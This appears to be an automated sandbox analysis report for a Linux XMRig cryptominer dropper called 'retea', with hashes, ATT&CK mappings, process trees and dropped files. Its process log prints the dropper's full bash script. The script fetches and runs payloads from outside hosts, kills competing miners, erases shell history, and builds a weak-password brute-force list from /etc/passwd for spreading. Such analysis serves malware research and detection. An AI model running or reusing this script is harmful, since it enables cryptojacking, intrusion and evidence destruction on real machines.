xmrig_linux | 061f2562bf4ad2db25f218e218920aece057024cd2c8826c87f65acc29583191

Analysis

max time kernel
57s
max time network
147s
platform
ubuntu-22.04_amd64
resource
ubuntu2204-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
submitted
22-11-2024 18:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

retea
Size

294KB
MD5

49ec3eec3d3a18aa743eab6310c9746c
SHA1

65c990977507dba35374caa78f5368b20daa6cbe
SHA256

061f2562bf4ad2db25f218e218920aece057024cd2c8826c87f65acc29583191
SHA512

cfeda52c6bf213aff2285431049f1448e7585a5c5629cbe26e19bfe74a6080b6bbe37101dca2ec146470c8c36694911ac2bc6ba29e592660edc60b8235590a7a
SSDEEP

6144:Uc67QgAIeT1frtcimb3YWYkFEXZSrEyphHRRyidUXHB/bzogJ0kYEIU0CGA:MaLT1frtUfEXI3pEwUR/vv0vEB0Cf

Score

10^/10

xmrig_linux defense_evasion discovery miner

Malware Config

Signatures

Xmrig_linux family
xmrig_linux
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodnetworkbash

pid process

1604 chmod
1607 chmod
1633 network
1566 bash
Enumerates running processes
Discovers information about currently running processes on the system

pid	process
1604	chmod
1607	chmod
1633	network
1566	bash

Reads CPU attributes 1 TTPs 8 IoCs

discovery

System Information Discovery

T1082

Processes:

pkillpkillpkillpkillpkillpkillpkillpkill

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

pkillkillallpkillpkillpkillpkillpkillkillallpkillpkillkillall

description	ioc	process
File opened for reading	/proc/1564/cmdline	pkill
File opened for reading	/proc/207/stat	killall
File opened for reading	/proc/99/status	pkill
File opened for reading	/proc/26/status	pkill
File opened for reading	/proc/1053/cmdline	pkill
File opened for reading	/proc/499/cmdline	pkill
File opened for reading	/proc/1280/cmdline	pkill
File opened for reading	/proc/14/cmdline	pkill
File opened for reading	/proc/1372/cmdline	pkill
File opened for reading	/proc/263/stat	killall
File opened for reading	/proc/97/cmdline	pkill
File opened for reading	/proc/1107/stat	killall
File opened for reading	/proc/92/status	pkill
File opened for reading	/proc/1013/cmdline	pkill
File opened for reading	/proc/1162/cmdline	pkill
File opened for reading	/proc/1566/status	pkill
File opened for reading	/proc/3/status	pkill
File opened for reading	/proc/1165/status	pkill
File opened for reading	/proc/411/cmdline	pkill
File opened for reading	/proc/26/status	pkill
File opened for reading	/proc/195/cmdline	pkill
File opened for reading	/proc/91/stat	killall
File opened for reading	/proc/213/status	pkill
File opened for reading	/proc/11/cmdline	pkill
File opened for reading	/proc/675/stat	killall
File opened for reading	/proc/1310/stat	killall
File opened for reading	/proc/79/cmdline	pkill
File opened for reading	/proc/94/cmdline	pkill
File opened for reading	/proc/209/cmdline	pkill
File opened for reading	/proc/85/cmdline	pkill
File opened for reading	/proc/1204/stat	killall
File opened for reading	/proc/73/cmdline	pkill
File opened for reading	/proc/1254/status	pkill
File opened for reading	/proc/8/stat	killall
File opened for reading	/proc/79/status	pkill
File opened for reading	/proc/1062/cmdline	pkill
File opened for reading	/proc/992/cmdline	pkill
File opened for reading	/proc/1088/status	pkill
File opened for reading	/proc/21/cmdline	pkill
File opened for reading	/proc/665/cmdline	pkill
File opened for reading	/proc/1098/status	pkill
File opened for reading	/proc/18/cmdline	pkill
File opened for reading	/proc/588/stat	killall
File opened for reading	/proc/1228/stat	killall
File opened for reading	/proc/75/cmdline	pkill
File opened for reading	/proc/sys/kernel/osrelease	pkill
File opened for reading	/proc/1280/stat	killall
File opened for reading	/proc/12/status	pkill
File opened for reading	/proc/110/status	pkill
File opened for reading	/proc/22/status	pkill
File opened for reading	/proc/74/cmdline	pkill
File opened for reading	/proc/716/status	pkill
File opened for reading	/proc/586/status	pkill
File opened for reading	/proc/411/cmdline	pkill
File opened for reading	/proc/1053/cmdline	pkill
File opened for reading	/proc/215/stat	killall
File opened for reading	/proc/1285/cmdline	pkill
File opened for reading	/proc/845/cmdline	pkill
File opened for reading	/proc/8/cmdline	pkill
File opened for reading	/proc/1/cmdline	pkill
File opened for reading	/proc/2/cmdline	pkill
File opened for reading	/proc/679/status	pkill
File opened for reading	/proc/10/status	pkill
File opened for reading	/proc/9/status	pkill

System Network Configuration Discovery 1 TTPs 1 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

rm

pid process

1614 rm

pid	process
1614	rm

Writes file to shm directory 4 IoCs

Malware can drop malicious files in the shm directory which will run directly from RAM.

Processes:

bash

description	ioc	process
File opened for modification	/dev/shm/.x/pass	bash
File opened for modification	/dev/shm/.x/i	bash
File opened for modification	/dev/shm/.x/bios.txt	bash
File opened for modification	/dev/shm/.x/.usrs	bash

/tmp/retea
/tmp/retea
1⤵
PID:1566

/bin/bash
/tmp/retea -c "exec '/tmp/retea' \"\$@\"" /tmp/retea
1⤵
PID:1566

/tmp/retea
/tmp/retea
1⤵
PID:1566

/bin/bash
/tmp/retea -c " #!/bin/bash key=\$1 user=\$2 if [[ \$key == \"KOFVwMxV7k7XjP7fwXPY6Cmp16vf8EnL54650LjYb6WYBtuSs3Zd1Ncr3SrpvnAU\" ]] then echo -e \"\" else echo Logged with successfully. rm -rf .retea crontab -r ; pkill xrx ; pkill haiduc ; pkill blacku ; pkill xMEu ; cd /var/tmp ; rm -rf /dev/shm/.x /var/tmp/.update-logs /var/tmp/Documents /tmp/.tmp ; mkdir /tmp/.tmp ; pkill Opera ; rm -rf xmrig .diicot .black Opera ; rm -rf .black xmrig.1 ; pkill cnrig ; pkill java ; killall java ; pkill xmrig ; killall cnrig ; killall xmrig ; wget -q dinpasiune.com/payload || curl -O -s -L dinpasiune.com/payload || wget80.76.51.5/payload || curl -O -s -L80.76.51.5/payload ; chmod +x * ; ./payload >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history chmod +x .teaca ; ./.teaca > /dev/null 2>&1 ; history -c ; rm -rf .bash_history ~/.bash_history fi rm -rf /etc/sysctl.conf ; echo \"fs.file-max = 2097152\" > /etc/sysctl.conf ; sysctl -p ; ulimit -Hn ; ulimit -n 99999 -u 999999 cd /dev/shm mkdir /dev/shm/.x > /dev/null 2>&1 mv network .x/ cd .x rm -rf retea ips iptemp ips iplist sleep 1 rm -rf pass useri=`cat /etc/passwd |grep -v nologin |grep -v false |grep -v sync |grep -v halt|grep -v shutdown|cut -d: -f1` echo \$useri > .usrs pasus=.usrs check=`grep -c . .usrs` for us in \$(cat \$pasus) ; do printf \"\$us \$us\\n\" >> pass printf \"\$us \$us\"\$us\"\\n\" >> pass printf \"\$us \"\$us\"123\\n\" >> pass printf \"\$us \"\$us\"123456\\n\" >> pass printf \"\$us 123456\\n\">> pass printf \"\$us 1\\n\">> pass printf \"\$us 12\\n\">> pass printf \"\$us 123\\n\">> pass printf \"\$us 1234\\n\">> pass printf \"\$us 12345\\n\">> pass printf \"\$us 12345678\\n\">> pass printf \"\$us 123456789\\n\">> pass printf \"\$us 123.com\\n\">> pass printf \"\$us 123456.com\\n\">> pass printf \"\$us 123\\n\" >> pass printf \"\$us 1qaz@WSX\\n\" >> pass printf \"\$us \"\$us\"@123\\n\" >> pass printf \"\$us \"\$us\"@1234\\n\" >> pass printf \"\$us \"\$us\"@123456\\n\" >> pass printf \"\$us \"\$us\"123\\n\" >> pass printf \"\$us \"\$us\"1234\\n\" >> pass printf \"\$us \"\$us\"123456\\n\" >> pass printf \"\$us qwer1234\\n\" >> pass printf \"\$us 111111\\n\">> pass printf \"\$us Passw0rd\\n\" >> pass printf \"\$us P@ssw0rd\\n\" >> pass printf \"\$us qaz123!@#\\n\" >> pass printf \"\$us !@#\\n\" >> pass printf \"\$us password\\n\" >> pass printf \"\$us Huawei@123\\n\" >> pass done wait sleep 0.5 cat bios.txt | sort -R | uniq | uniq > i cat i > bios.txt ./network \"rm -rf /var/tmp/Documents ; mkdir /var/tmp/Documents 2>&1 ; crontab -r ; chattr -iae ~/.ssh/authorized_keys >/dev/null 2>&1 ; cd /var/tmp ; chattr -iae /var/tmp/Documents/.diicot ; pkill Opera ; pkill cnrig ; pkill java ; killall java ; pkill xmrig ; killall cnrig ; killall xmrig ;cd /var/tmp/; mv /var/tmp/diicot /var/tmp/Documents/.diicot ; mv /var/tmp/kuak /var/tmp/Documents/kuak ; cd /var/tmp/Documents ; chmod +x .* ; /var/tmp/Documents/.diicot >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history ; cd /tmp/ ; wget -q 80.76.51.5/.NzJjOTYwxx5/.balu || curl -O -s -L 80.76.51.5/.NzJjOTYwxx5/.balu ; mv .balu cache ; chmod +x cache ; ./cache >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history\" sleep 25 function Miner { rm -rf /dev/shm/retea /dev/shm/.magic ; rm -rf /dev/shm/.x ~/retea /tmp/kuak /tmp/diicot /tmp/.diicot ; rm -rf ~/.bash_history history -c } Miner " /tmp/retea
1⤵
- File and Directory Permissions Modification
- Writes file to shm directory
PID:1566
- /usr/bin/rm
  rm -rf .retea
  2⤵
  PID:1567
- /usr/bin/crontab
  crontab -r
  2⤵
  PID:1568
- /usr/bin/pkill
  pkill xrx
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1569
- /usr/bin/pkill
  pkill haiduc
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1570
- /usr/bin/pkill
  pkill blacku
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1571
- /usr/bin/pkill
  pkill xMEu
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1578
- /usr/bin/rm
  rm -rf /dev/shm/.x /var/tmp/.update-logs /var/tmp/Documents /tmp/.tmp
  2⤵
  PID:1579
- /usr/bin/mkdir
  mkdir /tmp/.tmp
  2⤵
  PID:1580
- /usr/bin/pkill
  pkill Opera
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1581
- /usr/bin/rm
  rm -rf xmrig .diicot .black Opera
  2⤵
  PID:1582
- /usr/bin/rm
  rm -rf .black xmrig.1
  2⤵
  PID:1583
- /usr/bin/pkill
  pkill cnrig
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1584
- /usr/bin/pkill
  pkill java
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1585
- /usr/bin/killall
  killall java
  2⤵
  - Reads runtime system information
  PID:1586
- /usr/bin/pkill
  pkill xmrig
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1587
- /usr/bin/killall
  killall cnrig
  2⤵
  - Reads runtime system information
  PID:1591
- /usr/bin/killall
  killall xmrig
  2⤵
  - Reads runtime system information
  PID:1592
- /usr/bin/wget
  wget -q dinpasiune.com/payload
  2⤵
  PID:1593
- /usr/bin/curl
  curl -O -s -L dinpasiune.com/payload
  2⤵
  PID:1595
- /var/tmp/wget80.76.51.5/payload
  wget80.76.51.5/payload
  2⤵
  PID:1602
- /usr/bin/curl
  curl -O -s -L80.76.51.5/payload
  2⤵
  PID:1603
- /usr/bin/chmod
  chmod +x systemd-private-9faebdbd91c94f559bb8c94d92724182-ModemManager.service-lAvep9 systemd-private-9faebdbd91c94f559bb8c94d92724182-colord.service-uYapRX systemd-private-9faebdbd91c94f559bb8c94d92724182-power-profiles-daemon.service-15dHNu systemd-private-9faebdbd91c94f559bb8c94d92724182-switcheroo-control.service-NtnwxA systemd-private-9faebdbd91c94f559bb8c94d92724182-systemd-logind.service-1kK5cw systemd-private-9faebdbd91c94f559bb8c94d92724182-systemd-oomd.service-zbT20I systemd-private-9faebdbd91c94f559bb8c94d92724182-systemd-resolved.service-1E39rf systemd-private-9faebdbd91c94f559bb8c94d92724182-upower.service-tRdU3B
  2⤵
  - File and Directory Permissions Modification
  PID:1604
- /usr/bin/rm
  rm -rf .bash_history /root/.bash_history
  2⤵
  PID:1606
- /var/tmp/payload
  ./payload
  2⤵
  PID:1605
- /usr/bin/chmod
  chmod +x .teaca
  2⤵
  - File and Directory Permissions Modification
  PID:1607
- /var/tmp/.teaca
  ./.teaca
  2⤵
  PID:1608
- /usr/bin/rm
  rm -rf .bash_history /root/.bash_history
  2⤵
  PID:1609
- /usr/bin/rm
  rm -rf /etc/sysctl.conf
  2⤵
  PID:1610
- /usr/sbin/sysctl
  sysctl -p
  2⤵
  PID:1611
- /usr/bin/mkdir
  mkdir /dev/shm/.x
  2⤵
  PID:1612
- /usr/bin/mv
  mv network .x/
  2⤵
  PID:1613
- /usr/bin/rm
  rm -rf retea ips iptemp ips iplist
  2⤵
  - System Network Configuration Discovery
  PID:1614
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:1615
- /usr/bin/rm
  rm -rf pass
  2⤵
  PID:1616
- /usr/bin/grep
  grep -v halt
  2⤵
  PID:1622
- /usr/bin/grep
  grep -v sync
  2⤵
  PID:1621
- /usr/bin/cut
  cut -d: -f1
  2⤵
  PID:1624
- /usr/bin/grep
  grep -v shutdown
  2⤵
  PID:1623
- /usr/bin/grep
  grep -v false
  2⤵
  PID:1620
- /usr/bin/grep
  grep -v nologin
  2⤵
  PID:1619
- /usr/bin/cat
  cat /etc/passwd
  2⤵
  PID:1618
- /usr/bin/grep
  grep -c . .usrs
  2⤵
  PID:1625
- /usr/bin/cat
  cat .usrs
  2⤵
  PID:1626
- /usr/bin/sleep
  sleep 0.5
  2⤵
  PID:1627
- /usr/bin/uniq
  uniq
  2⤵
  PID:1630
- /usr/bin/sort
  sort -R
  2⤵
  PID:1629
- /usr/bin/uniq
  uniq
  2⤵
  PID:1631
- /usr/bin/cat
  cat bios.txt
  2⤵
  PID:1628
- /usr/bin/cat
  cat i
  2⤵
  PID:1632
- /dev/shm/.x/network
  ./network "rm -rf /var/tmp/Documents ; mkdir /var/tmp/Documents 2>&1 ; crontab -r ; chattr -iae ~/.ssh/authorized_keys >/dev/null 2>&1 ; cd /var/tmp ; chattr -iae /var/tmp/Documents/.diicot ; pkill Opera ; pkill cnrig ; pkill java ; killall java ; pkill xmrig ; killall cnrig ; killall xmrig ;cd /var/tmp/; mv /var/tmp/diicot /var/tmp/Documents/.diicot ; mv /var/tmp/kuak /var/tmp/Documents/kuak ; cd /var/tmp/Documents ; chmod +x .* ; /var/tmp/Documents/.diicot >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history ; cd /tmp/ ; wget -q 80.76.51.5/.NzJjOTYwxx5/.balu || curl -O -s -L 80.76.51.5/.NzJjOTYwxx5/.balu ; mv .balu cache ; chmod +x cache ; ./cache >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history"
  2⤵
  - File and Directory Permissions Modification
  PID:1633
- /usr/bin/sleep
  sleep 25
  2⤵
  PID:1634
- /usr/bin/rm
  rm -rf /dev/shm/retea /dev/shm/.magic
  2⤵
  PID:1636
- /usr/bin/rm
  rm -rf /dev/shm/.x /root/retea /tmp/kuak /tmp/diicot /tmp/.diicot
  2⤵
  PID:1637
- /usr/bin/rm
  rm -rf /root/.bash_history
  2⤵
  PID:1638

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/dev/shm/.x/.usrs

Filesize
10B

MD5
193fbe42d4ec68ee592f790558a6b2a2

SHA1
1e71a73294e1a6cabf1c87d4241e4ed2e672879e

SHA256
6f67376894c0041f09a2128653255533724c15151006bb153e7cab389f2ff6d1

SHA512
c70248c473a9782eed317792fd8535b6674be9967cdc9450c61dc16354dbf81a1e015cc3321ebb15c3c2fdab378f4ce29e9e4f15a7cf2c1e4ba351031fba7bd6

Download Submit
/dev/shm/.x/pass

Filesize
10B

MD5
8098791106f621a1139c64db9e6b8604

SHA1
43b301e1e9d987c85896bea1368ef3d2fab7bb99

SHA256
2f97a866a83e4b4e086aaaffa38f0ef0279f20a333f40bdb07f3401a5ce81fe1

SHA512
e3c0415f91da102dcb1cb63fcc09cab89d08ad373cb83b48bd2f134b1e7ebc87ce20228e005735cf00e268f2f69b8de114f5ddf00de34dc40931251460487bc4

Download Submit
/dev/shm/.x/pass

Filesize
24B

MD5
76723d6902d4634e5c05b3622130f880

SHA1
fd0a01f2a4c57a93356e97ca54776548df682da0

SHA256
771113db09bddf605b93389525f97b4d72e8b3187b75a2cf36884938e5ca3291

SHA512
a7467f8eb5b6c3c18aa7206fed5e1645305aa828afc0368e9dd1363b13b190a53edfeda371226c041596c004dda808e173647996757474d54015c0fa81a98670

Download Submit
/dev/shm/.x/pass

Filesize
37B

MD5
dc96666f8a529179a201af92383360ea

SHA1
6baaba36e42373b0c8b36657d84225820b02c018

SHA256
de890c75210a94e89ee7883d28f94a6f3481ce89f6fb6e56c06f05391a438b79

SHA512
c58a22420020327de96491e3f7be282c339670442196a3dd94cd700d6214cbcff6dfea68e5418bb5c0cac983885ac4e85a44ac08917c2a7d077b812b7efbd760

Download Submit
/dev/shm/.x/pass

Filesize
53B

MD5
0ef6d2e7604d35dd9411089bbb1942ba

SHA1
f5a8646033c5df1a6ac820d93283d7314da4f16a

SHA256
0b2c4e44393449ec5c5184282d7790aa4fb2218085449e359816916553375ae7

SHA512
625e18753b45ad17eaf8c37213db85c9371cce7c43a822492821b6e6434f0a291ee06185bba08b41c5a51759a58c99779b765cdc38aa76f831900d5fb8c61e5f

Download Submit
/dev/shm/.x/pass

Filesize
65B

MD5
534c18fea42e4d4ee6821592f118fc12

SHA1
32aa842a6f8815cd3b571b0e070cd681d635a6de

SHA256
9f7ef656b1d8ed7c046d3ca49bb523b981baee7742669d7790fce5a6381254c8

SHA512
622c643a9c9e41b18b99f54eac1723332ae7bd26d42105747951e578c55be5fc2338879fd79a9008df6f6e7f69a4e203104998fe8f48ff53fddd675f209bfa90

Download Submit
/dev/shm/.x/pass

Filesize
776B

MD5
3059976a246142a1997b6ce328dbe4cf

SHA1
3794c3c89504f72068626242b4447f2e7912a8c5

SHA256
bbd8c4db89a96f9bbd8b0bbf9968c3ffa011f1d16c28d11b8450ae238f2bbd2b

SHA512
2514fb4cd73ef16d488c138f2dad8e55a48d3597ceade88e7a73762b3e1a6c652e30a31b1769de651433004e538c58ce0ab04b936e279598fad848e9c4460fbf

Download Submit
memory/1566-1-0x0000000000400000-0x00000000006c3d18-memory.dmp

Download
memory/1566-2-0x0000000000400000-0x00000000006c3d18-memory.dmp

Download